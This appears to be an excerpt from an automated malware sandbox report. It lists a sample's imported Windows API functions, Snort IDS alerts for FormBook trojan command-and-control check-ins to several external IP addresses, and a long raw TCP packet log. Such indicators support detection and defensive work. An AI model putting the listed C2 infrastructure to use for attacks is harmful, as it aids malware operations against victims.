                                                                        KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        05/22/24-17:32:25.365112TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980580192.168.11.3034.174.122.2
                                                                        05/22/24-17:33:17.446010TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981780192.168.11.3037.140.192.90
                                                                        05/22/24-17:36:47.604534TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985780192.168.11.3035.213.232.35
                                                                        05/22/24-17:31:28.207675TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979780192.168.11.30139.162.5.234
                                                                        05/22/24-17:35:02.013326TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983480192.168.11.3034.149.87.45
                                                                        05/22/24-17:34:05.630665TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982580192.168.11.3014.225.238.195
                                                                        05/22/24-17:35:10.120994TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983780192.168.11.3034.149.87.45
                                                                        05/22/24-17:31:55.882236TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980280192.168.11.3034.149.87.45
                                                                        05/22/24-17:33:26.063885TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982080192.168.11.3037.140.192.90
                                                                        05/22/24-17:36:11.593194TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984780192.168.11.30203.161.49.193
                                                                        05/22/24-17:36:38.705824TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985480192.168.11.3035.213.232.35
                                                                        05/22/24-17:35:04.716804TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983580192.168.11.3034.149.87.45
                                                                        05/22/24-17:34:40.434447TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983180192.168.11.30139.162.5.234
                                                                        05/22/24-17:32:56.756415TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981280192.168.11.3047.243.134.243
                                                                        05/22/24-17:34:14.708140TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982880192.168.11.3014.225.238.195
                                                                        05/22/24-17:33:05.996160TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981480192.168.11.30203.161.49.193
                                                                        05/22/24-17:35:40.369095TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984180192.168.11.3034.174.122.2
                                                                        05/22/24-17:31:12.283785TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979680192.168.11.3091.195.240.123
                                                                        05/22/24-17:32:47.971615TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980980192.168.11.3047.243.134.243
                                                                        05/22/24-17:36:17.064158TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984980192.168.11.30203.161.49.193
                                                                        05/22/24-17:32:33.605540TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980880192.168.11.3034.174.122.2
                                                                        05/22/24-17:33:42.460525TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982180192.168.11.30185.76.64.170
                                                                        05/22/24-17:33:51.093524TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982480192.168.11.30185.76.64.170
                                                                        05/22/24-17:36:31.276565TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24985380192.168.11.3037.140.192.90
                                                                        05/22/24-17:32:50.831928TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981080192.168.11.3047.243.134.243
                                                                        05/22/24-17:34:08.664446TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982680192.168.11.3014.225.238.195
                                                                        05/22/24-17:36:22.652530TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985080192.168.11.3037.140.192.90
                                                                        05/22/24-17:31:31.097387TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979880192.168.11.30139.162.5.234
                                                                        05/22/24-17:34:31.825253TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982980192.168.11.3091.195.240.123
                                                                        05/22/24-17:31:53.173985TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980180192.168.11.3034.149.87.45
                                                                        05/22/24-17:35:34.866076TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983980192.168.11.3034.174.122.2
                                                                        05/22/24-17:35:54.305818TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984280192.168.11.3047.243.134.243
                                                                        05/22/24-17:36:41.668322TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985580192.168.11.3035.213.232.35
                                                                        05/22/24-17:36:08.860967TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984680192.168.11.30203.161.49.193
                                                                        05/22/24-17:36:03.208013TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984580192.168.11.3047.243.134.243
                                                                        05/22/24-17:31:36.884895TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980080192.168.11.30139.162.5.234
                                                                        05/22/24-17:33:20.315661TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981880192.168.11.3037.140.192.90
                                                                        05/22/24-17:35:32.118312TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983880192.168.11.3034.174.122.2
                                                                        05/22/24-17:32:28.113117TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980680192.168.11.3034.174.122.2
                                                                        05/22/24-17:33:11.463863TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981680192.168.11.30203.161.49.193
                                                                        05/22/24-17:33:45.336821TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982280192.168.11.30185.76.64.170
                                                                        05/22/24-17:36:25.526064TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985180192.168.11.3037.140.192.90
                                                                        05/22/24-17:34:46.221949TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983380192.168.11.30139.162.5.234
                                                                        05/22/24-17:32:01.287665TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980480192.168.11.3034.149.87.45
                                                                        05/22/24-17:33:03.263104TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981380192.168.11.30203.161.49.193
                                                                        05/22/24-17:34:37.539385TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983080192.168.11.30139.162.5.234
                                                                        05/22/24-17:35:57.219108TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984380192.168.11.3047.243.134.243

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 22, 2024 17:30:27.642401934 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:27.642420053 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:27.642594099 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:27.657175064 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:27.657185078 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.021905899 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.022181034 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.022244930 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.022542953 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.022727013 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.080389023 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.080410004 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.080746889 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.080903053 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.082923889 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.124178886 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.434084892 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.434179068 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.434293032 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.434353113 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.434401035 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.434401035 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.434429884 CEST44349793142.250.69.206192.168.11.30
                                                                        May 22, 2024 17:30:28.434659958 CEST49793443192.168.11.30142.250.69.206
                                                                        May 22, 2024 17:30:28.641369104 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:28.641388893 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:28.641639948 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:28.642242908 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:28.642254114 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:29.007148027 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:29.007344007 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:29.011647940 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:29.011657953 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:29.011889935 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:29.012098074 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:29.012366056 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:29.060178041 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.386558056 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.386759043 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.386804104 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.410898924 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.411123037 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.423156977 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.423369884 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.435422897 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.435616016 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.435626030 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.435889959 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.561914921 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.562186003 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.562196970 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.562393904 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.567959070 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.568149090 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.568159103 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.568430901 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.580244064 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.580462933 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.580476046 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.580684900 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.592505932 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.592698097 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.592708111 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.592931032 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.604782104 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.605101109 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.605110884 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.605309010 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.617089033 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.617295980 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.617306948 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.617521048 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.629343987 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.629568100 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.629578114 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.629800081 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.641606092 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.641824961 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.641835928 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.642072916 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.652812004 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.653048992 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.653059959 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.653317928 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.664017916 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.664223909 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.664251089 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.664462090 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.675255060 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.675518990 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.675529957 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.675743103 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.686434031 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.686682940 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.692081928 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.692266941 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.692276955 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.692452908 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.703303099 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.703531027 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.703541994 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.703747034 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.737363100 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.737572908 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.737584114 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.737756968 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.742150068 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.742373943 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.742384911 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.742604017 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.751501083 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.751691103 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.751701117 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.751873016 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.759994984 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.760162115 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.760170937 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.760420084 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.768421888 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.768668890 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.768678904 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.768908978 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.776905060 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.776948929 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.777070045 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.777081013 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.777087927 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.777234077 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.785368919 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.785556078 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.785567045 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.785738945 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.793934107 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.794137001 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.794147015 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.794349909 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.802392006 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.802654982 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.802665949 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.802938938 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.810833931 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.811079979 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.811090946 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.811320066 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.819303036 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.819632053 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.823494911 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.823772907 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.823782921 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.823991060 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.831943035 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.832331896 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.832341909 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.832551956 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.840522051 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.840806007 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.840816021 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.840995073 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.848875999 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.849097013 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.849104881 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.849574089 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.857436895 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.857670069 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.857680082 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.857906103 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.865400076 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.865624905 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.865634918 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.865803957 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.873410940 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.873640060 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.873648882 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.873817921 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.880943060 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.881194115 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.881201029 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.881376982 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.888591051 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.888761997 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.888768911 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.888942003 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.896106005 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.896343946 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.896354914 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.896507978 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.903316021 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.903464079 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.903472900 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.903619051 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.910553932 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.910883904 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.910906076 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.911494970 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.917651892 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.917957067 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.921351910 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.921565056 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.921575069 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.921772957 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.928534985 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.928844929 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.928854942 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.929065943 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.935765982 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.935998917 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.936022997 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.936250925 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.940309048 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.940558910 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.940582991 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.940850973 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.944742918 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.944987059 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.944996119 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.945203066 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.949222088 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.949445963 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.949455976 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.949657917 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.953726053 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.953967094 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.953990936 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.954195976 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.958101988 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.958343983 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.958353996 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.958544016 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.962487936 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.962702990 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.962729931 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.962910891 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.966836929 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.967130899 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.967140913 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.967358112 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.971070051 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.971308947 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.971319914 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.971534967 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.975302935 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.975542068 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.975552082 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.975739002 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.979592085 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.979831934 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.981570959 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.981760025 CEST49794443192.168.11.30142.251.33.97
                                                                        May 22, 2024 17:30:30.981769085 CEST44349794142.251.33.97192.168.11.30
                                                                        May 22, 2024 17:30:30.981982946 CEST49794443192.168.11.30142.251.33.97
